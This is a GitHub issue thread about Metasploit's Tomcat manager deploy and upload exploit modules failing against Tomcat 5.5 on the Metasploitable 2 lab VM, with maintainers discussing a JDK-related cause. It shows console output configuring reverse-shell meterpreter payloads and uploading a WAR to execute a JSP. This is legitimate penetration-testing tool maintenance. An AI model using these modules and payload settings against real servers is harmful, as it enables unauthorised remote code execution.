New issue
Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.
By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.
Already on GitHub? Sign in to your account
multi/http/tomcat_mgr_deploy and multi/http/tomcat_mgr_upload not working (anymore) in latest Metasploit versions against Tomcat 5.5 in Metasploitable 2 #19174
Comments
@onillap not sure if it will work to solve your issue, but can you pick a different payload via the |
Hello, Module options (exploit/multi/http/tomcat_mgr_deploy): Name Current Setting Required Description HttpPassword tomcat no The password for the specified username Payload options (multi/meterpreter/reverse_http): Name Current Setting Required Description LHOST 192.168.1.195 yes The local listener hostname Exploit target: Id Name 0 Automatic View the full module info with the info, or info -d command. msf6 exploit(multi/http/tomcat_mgr_deploy) > run [] Started HTTP reverse handler on http://192.168.1.195:8080 [] Automatically selected target "Linux x86" [*] Exploit completed, but no session was created. I also tried payload/java/shell/bind_tcp and payload/java/shell/reverse_tcp and others but it makes no difference. |
Metasploit 6.4.x 🔴
Metasploit 6.1.x 🟢
Would need to run a |
Since the error seems to be "javax.servlet.ServletException: Wrapper cannot find servlet class metasploit.PayloadServlet or a class it depends on", probably it might be related to this change which adds support for newer JDKs but breaks it with older ones: |
Thanks for taking a look 👍 If this pull request fails #18445 - i.e. |
Hello, I ran some tests, and this is the output The commit The commit Commit c73e815 |
Steps to reproduce
How'd you do it?
This exploit fails, but used to work in previous 6.2.x and 6.3.x Metasploit versions.
Also exploit/multi/http/tomcat_mgr_upload fails in a very similar way, but I don't know if this one previously worked or not...
This section should also tell us any relevant information about the
environment; for example, if an exploit that used to work is failing,
tell us the victim operating system and service versions.
Were you following a specific guide/tutorial or reading documentation?
No
Expected behavior
In previous versions of Metasploitable , for example 6.2.20 and 6.3.16, the exploit worked and I always got a Meterpreter shell.
Current behavior
msf6 exploit(multi/http/tomcat_mgr_deploy) > run
[] Started reverse TCP handler on 192.168.1.195:4444
[] Attempting to automatically select a target...
[*] OK - Server info
Tomcat Version: Apache Tomcat/5.5
OS Name: Linux
OS Version: 2.6.24-16-server
OS Architecture: i386
JVM Version: 1.5.0
JVM Vendor: Free Software Foundation, Inc.
[] Automatically selected target "Linux x86"
[] Uploading 6130 bytes as J5kgeJK2VwgsZjYwJINJd.war ...
[] Executing /J5kgeJK2VwgsZjYwJINJd/sqlYt1OOhUN2.jsp...
[-] Execution failed on J5kgeJK2VwgsZjYwJINJd [500 Internal Server Error]
[] <title>Apache Tomcat/5.5 - Error report</title><style></style>
HTTP Status 500 -
type Exception report
message
description The server encountered an internal error () that prevented it from fulfilling this request.
exception
root cause
note The full stack trace of the root cause is available in the Apache Tomcat/5.5 logs.
Apache Tomcat/5.5
[*] Undeploying J5kgeJK2VwgsZjYwJINJd ...
[*] Exploit completed, but no session was created.
Metasploit version
Framework: 6.4.5-dev
Console : 6.4.5-dev
Additional Information
If your version is less than
5.0.96
, please update to the latest version and ensure your issue is still present.If the issue is encountered within
msfconsole
, please run thedebug
command using the instructions below. If the issue is encountered outisdemsfconsole
, or the issue causesmsfconsole
to crash on startup, please delete this section.msfconsole
set loglevel 3
debug
command===8<=== CUT AND PASTE EVERYTHING BELOW THIS LINE ===8<===
line and make sure to REMOVE ANY SENSITIVE INFORMATION.Module/Datastore
The following global/module datastore, and database setup was configured before the issue occurred:
Collapse
Database Configuration
The database contains the following information:
Collapse
History
The following commands were ran during the session and before this issue occurred:
Collapse
Framework Errors
The following framework errors occurred before the issue occurred:
Collapse
Web Service Errors
The following web service errors occurred before the issue occurred:
Collapse
Framework Logs
The following framework logs were recorded before the issue occurred:
Collapse
Web Service Logs
The following web service logs were recorded before the issue occurred:
Collapse
Version/Install
The versions and install method of your Metasploit setup:
Collapse
The text was updated successfully, but these errors were encountered: